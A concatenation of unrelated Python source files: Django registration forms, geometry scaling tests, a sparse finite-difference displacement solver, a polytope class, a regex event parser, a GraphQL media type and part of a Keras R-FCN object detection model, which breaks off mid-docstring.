@property
def errors(self):
_errors = super(_ItemQuantityProductsFormSet, self).errors
        if not any(form.errors for form in self.forms):
return []
else:
return _errors
class VoucherForm(forms.Form):
required_css_class = 'label-required'
voucher = forms.CharField(
label="Voucher code",
help_text="If you have a voucher code, enter it here",
required=False,
)
def staff_products_form_factory(user):
''' Creates a StaffProductsForm that restricts the available products to
those that are available to a user. '''
products = inventory.Product.objects.all()
products = ProductController.available_products(user, products=products)
product_ids = [product.id for product in products]
product_set = inventory.Product.objects.filter(id__in=product_ids)
class StaffProductsForm(forms.Form):
''' Form for allowing staff to add an item to a user's cart. '''
product = forms.ModelChoiceField(
widget=forms.Select,
queryset=product_set,
)
quantity = forms.IntegerField(
min_value=0,
)
return StaffProductsForm
def staff_products_formset_factory(user):
''' Creates a formset of StaffProductsForm for the given user. '''
form_type = staff_products_form_factory(user)
return forms.formset_factory(form_type)
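# Illustrative usage sketch (request/view names are hypothetical):
#
#   StaffFormSet = staff_products_formset_factory(request.user)
#   formset = StaffFormSet(request.POST or None)
#   if formset.is_valid():
#       for form in formset:
#           product = form.cleaned_data["product"]
#           quantity = form.cleaned_data["quantity"]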
class InvoicesWithProductAndStatusForm(forms.Form):
required_css_class = 'label-required'
invoice = forms.ModelMultipleChoiceField(
widget=forms.CheckboxSelectMultiple,
queryset=commerce.Invoice.objects.all(),
)
def __init__(self, *a, **k):
category = k.pop('category', None) or []
product = k.pop('product', None) or []
status = int(k.pop('status', None) or 0)
category = [int(i) for i in category]
product = [int(i) for i in product]
super(InvoicesWithProductAndStatusForm, self).__init__(*a, **k)
qs = commerce.Invoice.objects.filter(
status=status or commerce.Invoice.STATUS_UNPAID,
).filter(
Q(lineitem__product__category__in=category) |
Q(lineitem__product__in=product)
)
# Uniqify
qs = commerce.Invoice.objects.filter(
id__in=qs,
)
qs = qs.select_related("user__attendee__attendeeprofilebase")
qs = qs.order_by("id")
self.fields['invoice'].queryset = qs
# self.fields['invoice'].initial = [i.id for i in qs] # UNDO THIS LATER
class InvoiceEmailForm(InvoicesWithProductAndStatusForm):
ACTION_PREVIEW = 1
ACTION_SEND = 2
ACTION_CHOICES = (
(ACTION_PREVIEW, "Preview"),
(ACTION_SEND, "Send emails"),
)
from_email = forms.CharField()
subject = forms.CharField()
body = forms.CharField(
widget=forms.Textarea,
)
action = forms.TypedChoiceField(
widget=forms.RadioSelect,
coerce=int,
choices=ACTION_CHOICES,
initial=ACTION_PREVIEW,
)
|
python
|
from typing import Tuple
from hypothesis import given
from gon.base import (Compound,
Geometry)
from gon.hints import Scalar
from tests.utils import (equivalence,
robust_invert)
from . import strategies
@given(strategies.geometries_with_coordinates_pairs)
def test_basic(geometry_with_factors: Tuple[Geometry, Scalar, Scalar]
) -> None:
geometry, factor_x, factor_y = geometry_with_factors
result = geometry.scale(factor_x, factor_y)
assert isinstance(result, Geometry)
assert equivalence(isinstance(result, Compound),
isinstance(geometry, Compound))
@given(strategies.geometries_with_non_zero_coordinates_pairs)
def test_round_trip(geometry_with_non_zero_factors
: Tuple[Geometry, Scalar, Scalar]) -> None:
geometry, factor_x, factor_y = geometry_with_non_zero_factors
result = geometry.scale(factor_x, factor_y)
assert (result.scale(robust_invert(factor_x), robust_invert(factor_y))
== geometry)
@given(strategies.geometries)
def test_neutral_factor(geometry: Geometry) -> None:
result = geometry.scale(1)
assert result == geometry
@given(strategies.empty_compounds_with_coordinates_pairs)
def test_empty(geometry_with_factors: Tuple[Geometry, Scalar, Scalar]) -> None:
geometry, factor_x, factor_y = geometry_with_factors
result = geometry.scale(factor_x, factor_y)
assert result == geometry
|
python
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from math import fabs
import compas
import numpy as np
import scipy as sp
import scipy.linalg
import scipy.sparse
import scipy.sparse.linalg
def compute_displacement_x(mesh, gate_points, x_size, z_size, coeff_diffusion=1):
"""calculate an x displacement for every non-gate non-boundary point,
given the pre-assigned displacements of the gate points. The left and
right edges of the wall are treated as fixed boundaries (Dirichlet) and
top and bottom as zero-gradient (Neumann)
"""
n = z_size
m = x_size
    nm = n * m
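    #grid ordering (inferred from the boundary handling below): dof index = x*n + z
    #with n = z_size, so the fast index runs along z; the +-1 diagonals of K couple
    #vertical (z) neighbors and the +-n diagonals couple horizontal (x) neighbors.
    #Each interior row of K then encodes the 5-point Laplace stencil:
    #  u[x,z-1] + u[x,z+1] + u[x-1,z] + u[x+1,z] - 4*u[x,z] = 0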
rhs = np.zeros(nm) #equation right hand side
    dia1 = np.ones(nm)*-4 #main diagonal of K matrix
    dia2 = np.ones(nm-1) #first super-diagonal, coupling each dof to its upper (z+1) neighbor
    dia2[np.arange(0,nm-1,n)]+=1 #Neumann BC using ghost-points
    dia2[np.arange(n-1,nm-1,n)]-=1 #Neumann BC using ghost-points
    dia3 = np.ones(nm-1) #first sub-diagonal, coupling each dof to its lower (z-1) neighbor
    dia3[np.arange(n-2,nm-1,n)]+=1 #Neumann
    dia3[np.arange(n-1,nm-1,n)]-=1 #Neumann
    dia4 = np.ones(nm-n) #n-th super-diagonal, coupling each dof to its right (x+1) neighbor
    dia5 = np.ones(nm-n) #n-th sub-diagonal, coupling each dof to its left (x-1) neighbor
#sparse coef. (stiffness) matrix built out of 5 diagonals
K = sp.sparse.diags([dia1, dia2, dia3, dia4, dia5], [0, 1, -1, n, -n], format='csc')
    #BCdofs is the vector of degrees of freedom with a Dirichlet (displacement) boundary condition;
    #the left and right edges are added to BCdofs first
    BCdofs=np.concatenate((np.arange(0,n),np.arange(nm-n,nm)))
    #assigning zero displacement to left and right
    BCvals=np.zeros(BCdofs.size)
    #to apply the Dirichlet condition, the rhs of each displacement-BC dof is set to the prescribed displacement
    rhs[BCdofs]=BCvals
#loop over gate points as additional displacement BCs (non-zero, in contrast to left & right edges)
for vertex in (gate_points):
glob_id = mesh.vertex_attribute(vertex, "glob_id")
x_disp = mesh.vertex_attribute(vertex, "x_disp")
rhs[glob_id]=x_disp
BCdofs = np.append(BCdofs,glob_id)
    #constructing an identity matrix (named Iinter) of size (nm x nm) with zeros on the diagonal
    # at displacement-BC dofs. If applied on (multiplied by) K, only non-BC (internal) dofs will remain
diaInter=np.ones(nm)
diaInter[BCdofs]=0.0
Iinter = sp.sparse.diags([diaInter], [0], format='csc')
    #constructing an identity matrix (named Ibc) of size (nm x nm) with zeros on the diagonal
    # at internal (non-BC) dofs. If applied on (multiplied by) K, only BC dofs will remain
diaBC=np.zeros(nm)
diaBC[BCdofs]=1.0
Ibc = sp.sparse.diags([diaBC], [0], format='csc')
#applying dirichlet on K, by zeroing out rows and columns of BC dofs and setting BC-diagonals to 1
K_BC= Iinter * K * Iinter + Ibc
#modifying the rhs for non-BC dofs to account for the eliminated dofs
    # the operation below assigns -K_internal*x_BC to rhs_internal (and doesn't change rhs_BC)
rhs = rhs - Iinter * (K-(Ibc * K ))* rhs
#solving the system
sol = scipy.sparse.linalg.spsolve(K_BC,rhs)
return sol
def compute_displacement_z(mesh, gate_points, x_size, z_size, coeff_diffusion=1):
    """calculate a z displacement for every non-gate non-boundary point,
    given the pre-assigned displacements of the gate points. Here the top and
    bottom edges of the wall are treated as fixed boundaries (Dirichlet) and
    the left and right as zero-gradient (Neumann)
    """
n = z_size
m = x_size
    nm = n * m
rhs = np.zeros(nm) #equation right hand side
    dia1 = np.ones(nm)*-4 #main diagonal of K matrix
    dia2 = np.ones(nm-1) #first super-diagonal, coupling each dof to its upper (z+1) neighbor
    dia3 = np.ones(nm-1) #first sub-diagonal, coupling each dof to its lower (z-1) neighbor
    dia4 = np.ones(nm-n) #n-th super-diagonal, coupling each dof to its right (x+1) neighbor
    dia4[:n]+=1 #Neumann BC using ghost-points at the left edge
    dia5 = np.ones(nm-n) #n-th sub-diagonal, coupling each dof to its left (x-1) neighbor
    dia5[-n:]+=1 #Neumann BC using ghost-points at the right edge
#sparse coef. (stiffness) matrix built out of 5 diagonals
K = sp.sparse.diags([dia1, dia2, dia3, dia4, dia5], [0, 1, -1, n, -n], format='csc')
    #BCdofs is the vector of degrees of freedom with a Dirichlet (displacement) boundary condition;
    #here the bottom and top edges are added to BCdofs first
    BCdofs=np.concatenate((np.arange(0,nm,n),np.arange(n-1,nm,n)))
    BCvals=np.zeros(BCdofs.size)
    #to apply the Dirichlet condition, the rhs of each displacement-BC dof is set to the prescribed displacement
    rhs[BCdofs]=BCvals
#loop over gate points as additional displacement BCs (non-zero, in contrast to left & right edges)
for vertex in (gate_points):
glob_id = mesh.vertex_attribute(vertex, "glob_id")
        z_disp = mesh.vertex_attribute(vertex, "z_disp")
        rhs[glob_id]=z_disp
BCdofs = np.append(BCdofs,glob_id)
    #constructing an identity matrix (named Iinter) of size (nm x nm) with zeros on the diagonal
    # at displacement-BC dofs. If applied on (multiplied by) K, only non-BC (internal) dofs will remain
diaInter=np.ones(nm)
diaInter[BCdofs]=0.0
Iinter = sp.sparse.diags([diaInter], [0], format='csc')
    #constructing an identity matrix (named Ibc) of size (nm x nm) with zeros on the diagonal
    # at internal (non-BC) dofs. If applied on (multiplied by) K, only BC dofs will remain
diaBC=np.zeros(nm)
diaBC[BCdofs]=1.0
Ibc = sp.sparse.diags([diaBC], [0], format='csc')
#applying dirichlet on K, by zeroing out rows and columns of BC dofs and setting BC-diagonals to 1
K_BC= Iinter * K * Iinter + Ibc
#modifying the rhs for non-BC dofs to account for the eliminated dofs
# the operation below assignes -K_internal*x_BC to rhs_internal (and doesn't change rhs_BC)
rhs = rhs - Iinter * (K-(Ibc * K ))* rhs
#solving the system
sol = scipy.sparse.linalg.spsolve(K_BC,rhs)
return sol
|
python
|
"""
A class to hold polytopes in H-representation.
Francesc Font-Clos
Oct 2018
"""
import numpy as np
class Polytope(object):
"""A polytope in H-representation."""
def __init__(self, A=None, b=None):
"""
Create a polytope in H-representation.
The polytope is defined as the set of
points x in Rn such that
A x <= b
"""
# dimensionality verifications
assert A is not None and b is not None
assert len(b.shape) == 1
assert len(A.shape) == 2
assert A.shape[0] == len(b)
# store data
self.A = A
self.b = b
self.dim = A.shape[1]
self.nplanes = A.shape[0]
self._find_auxiliar_points_in_planes()
def check_inside(self, point):
"""Check if a point is inside the polytope."""
checks = self.A@point <= self.b
check = np.all(checks)
return check
def _find_auxiliar_points_in_planes(self):
"""Find an auxiliar point for each plane."""
aux_points = [self._find_auxiliar_point(self.A[i],
self.b[i])
for i in range(self.nplanes)]
self.auxiliar_points = aux_points
def _find_auxiliar_point(self, Ai, bi):
"""Find an auxiliar point for one plane."""
p = np.zeros(self.dim)
j = np.argmax(Ai != 0)
p[j] = bi / Ai[j]
return p
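# Minimal usage sketch (illustrative, not part of the original module):
# the unit square [0, 1]^2 expressed as A x <= b.
if __name__ == "__main__":
    A = np.array([[1.0, 0.0], [-1.0, 0.0], [0.0, 1.0], [0.0, -1.0]])
    b = np.array([1.0, 0.0, 1.0, 0.0])
    square = Polytope(A=A, b=b)
    assert square.check_inside(np.array([0.5, 0.5]))
    assert not square.check_inside(np.array([1.5, 0.5]))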
|
python
|
import udfalcon
def test_outputs_return_results():
assert isinstance(udfalcon.fly({'output': 'return', 'mode': 'test'}), dict)
|
python
|
import re
def main():
eventRegex = r'\s*\n*-{50,}\s*\n*'
placeRegex = r'(?i)(?:place|yer|location|mekan)\s*:\s+(.*?)\s*?[\n\r]'
dateRegex = r'(?i)(?:date|tarih|deadline)\s*:\s+(.*?)\s*?[\n\r]'
timeRegex = r'(?i)(?:time|zaman)\s*:\s+(.*?)\s*?[\n\r]'
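    # Illustrative matches (sample lines are hypothetical): a line like
    # "Place: Conference Hall\n" yields "Conference Hall" from placeRegex and
    # "Tarih: 12.05.2018\n" yields "12.05.2018" from dateRegex; the (?i) flag
    # makes the keyword match case-insensitive.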
testData = getTestData()
for i in range(len(testData)):
events = re.split(eventRegex, testData[i])
for j, event in enumerate(events):
eventPlace = re.findall(placeRegex, event)
eventDate = re.findall(dateRegex, event)
eventTime = re.findall(timeRegex, event)
file = open("results/" + str(i) + "/" + str(j) + ".txt","a")
file.write(event)
# print("The event place is: {}, \nThe event date is: {}, \nThe event time is: {}, \nThe event is:\n {}".format(eventPlace, eventDate, eventTime, event))
file.close()
def getTestData():
"""looping through the test date and returning the data as a String array"""
testData = []
for i in range(12):
file = open("testData/test" + str(i) + ".txt", "r")
text = file.readlines()
file.close()
testData.append("".join(text))
return testData
if __name__== "__main__":
main()
|
python
|
import graphene
from .models import Media
from .service import MediaService
service = MediaService()
class MediaType(graphene.ObjectType):
'''
Media Type,
represents a GraphQL version of a media entity
'''
id = graphene.ID(required=True)
mime = graphene.String(required=True)
data = graphene.String(required=True)
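# Illustrative sketch (not part of the original module): exposing MediaType
# through a root query; "get_by_id" is an assumed MediaService method.
class Query(graphene.ObjectType):
    media = graphene.Field(MediaType, id=graphene.ID(required=True))

    def resolve_media(self, info, id):
        # Delegate the lookup to the service layer (hypothetical method name).
        return service.get_by_id(id)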
|
python
|
'''
This is Main class of RFCN Model
Contain the model's framework and call the backbone
'''
from KerasRFCN.Model.ResNet import ResNet
from KerasRFCN.Model.ResNet_dilated import ResNet_dilated
from KerasRFCN.Model.BaseModel import BaseModel
import KerasRFCN.Utils
import KerasRFCN.Losses
import keras.layers as KL
import keras.engine as KE
import tensorflow as tf
import numpy as np
import keras
import keras.backend as K
import keras.models as KM
class RFCN_Model(BaseModel):
"""docstring for RFCN_Model"""
def __init__(self, mode, config, model_dir):
"""
mode: Either "training" or "inference"
config: A Sub-class of the Config class
model_dir: Directory to save training logs and trained weights
"""
assert mode in ['training', 'inference']
assert config.BACKBONE in ['resnet50', 'resnet101', 'resnet50_dilated', 'resnet101_dilated']
self.mode = mode
self.config = config
self.model_dir = model_dir
self.set_log_dir()
self.keras_model = self.build(mode=mode, config=config)
def build(self, mode, config):
assert mode in ['training', 'inference']
h, w = config.IMAGE_SHAPE[:2]
if h / 2**6 != int(h / 2**6) or w / 2**6 != int(w / 2**6):
raise Exception("Image size must be dividable by 2 at least 6 times "
"to avoid fractions when downscaling and upscaling."
"For example, use 256, 320, 384, 448, 512, ... etc. ")
# Inputs
input_image = KL.Input(
shape=config.IMAGE_SHAPE.tolist(), name="input_image")
input_image_meta = KL.Input(shape=[None], name="input_image_meta")
if mode == "training":
# RPN GT
input_rpn_match = KL.Input(
shape=[None, 1], name="input_rpn_match", dtype=tf.int32)
input_rpn_bbox = KL.Input(
shape=[None, 4], name="input_rpn_bbox", dtype=tf.float32)
# Detection GT (class IDs, bounding boxes)
# 1. GT Class IDs (zero padded)
input_gt_class_ids = KL.Input(
shape=[None], name="input_gt_class_ids", dtype=tf.int32)
# 2. GT Boxes in pixels (zero padded)
# [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in image coordinates
input_gt_boxes = KL.Input(
shape=[None, 4], name="input_gt_boxes", dtype=tf.float32)
# Normalize coordinates
h, w = K.shape(input_image)[1], K.shape(input_image)[2]
image_scale = K.cast(K.stack([h, w, h, w], axis=0), tf.float32)
gt_boxes = KL.Lambda(lambda x: x / image_scale)(input_gt_boxes)
if config.BACKBONE in ['resnet50', 'resnet101']:
P2, P3, P4, P5, P6 = ResNet(input_image, architecture=config.BACKBONE).output_layers
else:
P2, P3, P4, P5, P6 = ResNet_dilated(input_image, architecture=config.BACKBONE).output_layers
# Note that P6 is used in RPN, but not in the classifier heads.
rpn_feature_maps = [P2, P3, P4, P5, P6]
mrcnn_feature_maps = [P2, P3, P4, P5]
### RPN ###
rpn = self.build_rpn_model(config.RPN_ANCHOR_STRIDE,
len(config.RPN_ANCHOR_RATIOS), 256)
# Loop through pyramid layers
layer_outputs = [] # list of lists
for p in rpn_feature_maps:
layer_outputs.append(rpn([p]))
# Concatenate layer outputs
# Convert from list of lists of level outputs to list of lists
# of outputs across levels.
# e.g. [[a1, b1, c1], [a2, b2, c2]] => [[a1, a2], [b1, b2], [c1, c2]]
output_names = ["rpn_class_logits", "rpn_class", "rpn_bbox"]
outputs = list(zip(*layer_outputs))
outputs = [KL.Concatenate(axis=1, name=n)(list(o))
for o, n in zip(outputs, output_names)]
rpn_class_logits, rpn_class, rpn_bbox = outputs
self.anchors = KerasRFCN.Utils.generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,
config.RPN_ANCHOR_RATIOS,
config.BACKBONE_SHAPES,
config.BACKBONE_STRIDES,
config.RPN_ANCHOR_STRIDE)
        # position-sensitive score map: k*k bins and total class num C
# Example: For coco, C = 80+1
scoreMapSize = config.K * config.K
ScoreMaps_classify = []
for feature_map_count, feature_map in enumerate(mrcnn_feature_maps):
# [W * H * class_num] * k^2
ScoreMap = KL.Conv2D(config.C * scoreMapSize, kernel_size=(1,1), name="score_map_class_{}".format(feature_map_count), padding='valid')(feature_map)
ScoreMaps_classify.append(ScoreMap)
ScoreMaps_regr = []
for feature_map_count, feature_map in enumerate(mrcnn_feature_maps):
# [W * H * 4] * k^2 ==> 4 = (x,y,w,h)
ScoreMap = KL.Conv2D(4 * scoreMapSize, kernel_size=(1,1), name="score_map_regr_{}".format(feature_map_count), padding='valid')(feature_map)
ScoreMaps_regr.append(ScoreMap)
# Generate proposals
# Proposals are [batch, N, (y1, x1, y2, x2)] in normalized coordinates
# and zero padded.
proposal_count = config.POST_NMS_ROIS_TRAINING if mode == "training"\
else config.POST_NMS_ROIS_INFERENCE
rpn_rois = ProposalLayer(proposal_count=proposal_count,
nms_threshold=config.RPN_NMS_THRESHOLD,
name="ROI",
anchors=self.anchors,
config=config)([rpn_class, rpn_bbox])
if mode == "training":
# Class ID mask to mark class IDs supported by the dataset the image
# came from.
_, _, _, active_class_ids = KL.Lambda(lambda x: parse_image_meta_graph(x))(input_image_meta)
# Generate detection targets
# Subsamples proposals and generates target outputs for training
# Note that proposal class IDs, gt_boxes, and gt_masks are zero
# padded. Equally, returned rois and targets are zero padded.
rois, target_class_ids, target_bbox =\
DetectionTargetLayer(config, name="proposal_targets")([
rpn_rois, input_gt_class_ids, gt_boxes])
# size = [batch, num_rois, class_num]
classify_vote = VotePooling(config.TRAIN_ROIS_PER_IMAGE, config.C, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="classify_vote")([rois] + ScoreMaps_classify)
classify_output = KL.TimeDistributed(KL.Activation('softmax'),name="classify_output")(classify_vote)
# 4 k^2 rather than 4k^2*C
regr_vote = VotePooling(config.TRAIN_ROIS_PER_IMAGE, 4, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="regr_vote")([rois] + ScoreMaps_regr)
regr_output = KL.TimeDistributed(KL.Activation('linear'),name="regr_output")(regr_vote)
rpn_class_loss = KL.Lambda(lambda x: KerasRFCN.Losses.rpn_class_loss_graph(*x), name="rpn_class_loss")(
[input_rpn_match, rpn_class_logits])
rpn_bbox_loss = KL.Lambda(lambda x: KerasRFCN.Losses.rpn_bbox_loss_graph(config, *x), name="rpn_bbox_loss")(
[input_rpn_bbox, input_rpn_match, rpn_bbox])
class_loss = KL.Lambda(lambda x: KerasRFCN.Losses.mrcnn_class_loss_graph(*x), name="mrcnn_class_loss")(
[target_class_ids, classify_vote, active_class_ids])
bbox_loss = KL.Lambda(lambda x: KerasRFCN.Losses.mrcnn_bbox_loss_graph(*x), name="mrcnn_bbox_loss")(
[target_bbox, target_class_ids, regr_output])
inputs = [input_image, input_image_meta,
input_rpn_match, input_rpn_bbox, input_gt_class_ids, input_gt_boxes]
outputs = [rpn_class_logits, rpn_class, rpn_bbox,
classify_vote, classify_output, regr_output,
rpn_rois, rpn_class_loss, rpn_bbox_loss, class_loss, bbox_loss]
keras_model = KM.Model(inputs, outputs, name='rfcn_train')
else: # inference
# Network Heads
# Proposal classifier and BBox regressor heads
# size = [batch, num_rois, class_num]
classify_vote = VotePooling(proposal_count, config.C, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="classify_vote")([rpn_rois] + ScoreMaps_classify)
classify_output = KL.TimeDistributed(KL.Activation('softmax'),name="classify_output")(classify_vote)
# 4 k^2 rather than 4k^2*C
regr_vote = VotePooling(proposal_count, 4, config.K, config.POOL_SIZE, config.BATCH_SIZE, config.IMAGE_SHAPE, name="regr_vote")([rpn_rois] + ScoreMaps_regr)
regr_output = KL.TimeDistributed(KL.Activation('linear'),name="regr_output")(regr_vote)
# Detections
# output is [batch, num_detections, (y1, x1, y2, x2, score)] in image coordinates
detections = DetectionLayer(config, name="mrcnn_detection")(
[rpn_rois, classify_output, regr_output, input_image_meta])
keras_model = KM.Model([input_image, input_image_meta],
[detections, classify_output, regr_output, rpn_rois, rpn_class, rpn_bbox],
name='rfcn_inference')
return keras_model
def build_rpn_model(self, anchor_stride, anchors_per_location, depth):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_logits: [batch, H, W, 2] Anchor classifier logits (before softmax)
        rpn_probs: [batch, H, W, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H, W, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
input_feature_map = KL.Input(shape=[None, None, depth],
name="input_rpn_feature_map")
outputs = self.rpn(input_feature_map, anchors_per_location, anchor_stride)
return KM.Model([input_feature_map], outputs, name="rpn_model")
def rpn(self, feature_map, anchors_per_location, anchor_stride):
"""Builds a Keras model of the Region Proposal Network.
It wraps the RPN graph so it can be used multiple times with shared
weights.
anchors_per_location: number of anchors per pixel in the feature map
anchor_stride: Controls the density of anchors. Typically 1 (anchors for
every pixel in the feature map), or 2 (every other pixel).
depth: Depth of the backbone feature map.
Returns a Keras Model object. The model outputs, when called, are:
rpn_logits: [batch, H, W, 2] Anchor classifier logits (before softmax)
        rpn_probs: [batch, H, W, 2] Anchor classifier probabilities.
rpn_bbox: [batch, H, W, (dy, dx, log(dh), log(dw))] Deltas to be
applied to anchors.
"""
shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu',
strides=anchor_stride,
name='rpn_conv_shared')(feature_map)
# Anchor Score. [batch, height, width, anchors per location * 2].
x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid',
activation='linear', name='rpn_class_raw')(shared)
# Reshape to [batch, anchors, 2]
rpn_class_logits = KL.Lambda(
lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 2]))(x)
# Softmax on last dimension of BG/FG.
rpn_probs = KL.Activation(
"softmax", name="rpn_class_xxx")(rpn_class_logits)
# Bounding box refinement. [batch, H, W, anchors per location, depth]
# where depth is [x, y, log(w), log(h)]
x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid",
activation='linear', name='rpn_bbox_pred')(shared)
# Reshape to [batch, anchors, 4]
rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 4]))(x)
return rpn_class_logits, rpn_probs, rpn_bbox
############################################################
# Proposal Layer
############################################################
def apply_box_deltas_graph(boxes, deltas):
"""Applies the given deltas to the given boxes.
boxes: [N, 4] where each row is y1, x1, y2, x2
deltas: [N, 4] where each row is [dy, dx, log(dh), log(dw)]
"""
# Convert to y, x, h, w
height = boxes[:, 2] - boxes[:, 0]
width = boxes[:, 3] - boxes[:, 1]
center_y = boxes[:, 0] + 0.5 * height
center_x = boxes[:, 1] + 0.5 * width
# Apply deltas
center_y += deltas[:, 0] * height
center_x += deltas[:, 1] * width
height *= tf.exp(deltas[:, 2])
width *= tf.exp(deltas[:, 3])
# Convert back to y1, x1, y2, x2
y1 = center_y - 0.5 * height
x1 = center_x - 0.5 * width
y2 = y1 + height
x2 = x1 + width
result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out")
return result
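# Worked example (illustrative): box [0, 0, 10, 10] with deltas
# [0.1, 0.2, 0, 0] has height = width = 10 and center (5, 5); the center
# shifts to (6, 7) and exp(0) leaves the size unchanged, giving [1, 2, 11, 12].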
def clip_boxes_graph(boxes, window):
"""
boxes: [N, 4] each row is y1, x1, y2, x2
window: [4] in the form y1, x1, y2, x2
"""
# Split corners
wy1, wx1, wy2, wx2 = tf.split(window, 4)
y1, x1, y2, x2 = tf.split(boxes, 4, axis=1)
# Clip
y1 = tf.maximum(tf.minimum(y1, wy2), wy1)
x1 = tf.maximum(tf.minimum(x1, wx2), wx1)
y2 = tf.maximum(tf.minimum(y2, wy2), wy1)
x2 = tf.maximum(tf.minimum(x2, wx2), wx1)
clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes")
return clipped
class ProposalLayer(KE.Layer):
"""Receives anchor scores and selects a subset to pass as proposals
to the second stage. Filtering is done based on anchor scores and
non-max suppression to remove overlaps. It also applies bounding
    box refinement deltas to anchors.
Inputs:
rpn_probs: [batch, anchors, (bg prob, fg prob)]
rpn_bbox: [batch, anchors, (dy, dx, log(dh), log(dw))]
Returns:
Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)]
"""
def __init__(self, proposal_count, nms_threshold, anchors,
config=None, **kwargs):
"""
anchors: [N, (y1, x1, y2, x2)] anchors defined in image coordinates
"""
super(ProposalLayer, self).__init__(**kwargs)
self.config = config
self.proposal_count = proposal_count
self.nms_threshold = nms_threshold
self.anchors = anchors.astype(np.float32)
def call(self, inputs):
# Box Scores. Use the foreground class confidence. [Batch, num_rois, 1]
scores = inputs[0][:, :, 1]
# Box deltas [batch, num_rois, 4]
deltas = inputs[1]
deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4])
# Base anchors
anchors = self.anchors
# Improve performance by trimming to top anchors by score
# and doing the rest on the smaller subset.
pre_nms_limit = min(6000, self.anchors.shape[0])
ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True,
name="top_anchors").indices
scores = KerasRFCN.Utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
deltas = KerasRFCN.Utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y),
self.config.IMAGES_PER_GPU)
anchors = KerasRFCN.Utils.batch_slice(ix, lambda x: tf.gather(anchors, x),
self.config.IMAGES_PER_GPU,
names=["pre_nms_anchors"])
# Apply deltas to anchors to get refined anchors.
# [batch, N, (y1, x1, y2, x2)]
boxes = KerasRFCN.Utils.batch_slice([anchors, deltas],
lambda x, y: apply_box_deltas_graph(x, y),
self.config.IMAGES_PER_GPU,
names=["refined_anchors"])
# Clip to image boundaries. [batch, N, (y1, x1, y2, x2)]
height, width = self.config.IMAGE_SHAPE[:2]
window = np.array([0, 0, height, width]).astype(np.float32)
boxes = KerasRFCN.Utils.batch_slice(boxes,
lambda x: clip_boxes_graph(x, window),
self.config.IMAGES_PER_GPU,
names=["refined_anchors_clipped"])
# Filter out small boxes
# According to Xinlei Chen's paper, this reduces detection accuracy
# for small objects, so we're skipping it.
# Normalize dimensions to range of 0 to 1.
normalized_boxes = boxes / np.array([[height, width, height, width]])
# Non-max suppression
def nms(normalized_boxes, scores):
indices = tf.image.non_max_suppression(
normalized_boxes, scores, self.proposal_count,
self.nms_threshold, name="rpn_non_max_suppression")
proposals = tf.gather(normalized_boxes, indices)
# Pad if needed
padding = tf.maximum(self.proposal_count - tf.shape(proposals)[0], 0)
proposals = tf.pad(proposals, [(0, padding), (0, 0)])
return proposals
proposals = KerasRFCN.Utils.batch_slice([normalized_boxes, scores], nms,
self.config.IMAGES_PER_GPU)
return proposals
def compute_output_shape(self, input_shape):
return (None, self.proposal_count, 4)
############################################################
# Detection Target Layer
############################################################
def overlaps_graph(boxes1, boxes2):
"""Computes IoU overlaps between two sets of boxes.
boxes1, boxes2: [N, (y1, x1, y2, x2)].
"""
    # 1. Tile boxes2 and repeat boxes1. This allows us to compare
    # every boxes1 against every boxes2 without loops.
    # TF doesn't have an equivalent to np.repeat() so simulate it
    # using tf.tile() and tf.reshape.
b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1),
[1, 1, tf.shape(boxes2)[0]]), [-1, 4])
b2 = tf.tile(boxes2, [tf.shape(boxes1)[0], 1])
# 2. Compute intersections
b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1)
b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1)
y1 = tf.maximum(b1_y1, b2_y1)
x1 = tf.maximum(b1_x1, b2_x1)
y2 = tf.minimum(b1_y2, b2_y2)
x2 = tf.minimum(b1_x2, b2_x2)
intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0)
# 3. Compute unions
b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1)
b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1)
union = b1_area + b2_area - intersection
# 4. Compute IoU and reshape to [boxes1, boxes2]
iou = intersection / union
overlaps = tf.reshape(iou, [tf.shape(boxes1)[0], tf.shape(boxes2)[0]])
return overlaps
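# Worked example (illustrative): boxes [0, 0, 2, 2] and [1, 1, 3, 3] intersect
# in the unit square [1, 1, 2, 2], so intersection = 1, union = 4 + 4 - 1 = 7,
# and IoU = 1/7 ~= 0.143.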
def detection_targets_graph(proposals, gt_class_ids, gt_boxes, config):
"""Generates detection targets for one image. Subsamples proposals and
generates target class IDs, bounding box deltas for each.
Inputs:
proposals: [N, (y1, x1, y2, x2)] in normalized coordinates. Might
be zero padded if there are not enough proposals.
gt_class_ids: [MAX_GT_INSTANCES] int class IDs
gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates.
Returns: Target ROIs and corresponding class IDs, bounding box shifts
rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates
